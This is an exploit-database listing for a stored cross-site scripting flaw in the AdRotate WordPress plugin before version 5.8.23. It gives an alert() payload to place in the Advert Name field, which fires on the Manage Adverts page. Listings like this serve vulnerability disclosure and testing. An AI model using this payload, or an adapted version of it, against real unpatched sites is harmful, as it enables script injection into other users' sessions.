Sploitus

Exploit for Adrotate < 5.8.23 - Admin+ XSS via Advert Name

wpexploit Β· 2022-04-11

Exploit Code

MARKDOWN4 lines
## https://sploitus.com/exploit?id=WPEX-ID:27AD58BA-B648-41D9-8074-16E4FEEAEE69
Create/edit an Advert and put the following payload in the Name field: "><img src=x onerror=alert(/XSS/)>

The XSS will be triggered when accessing the Manage Adverts page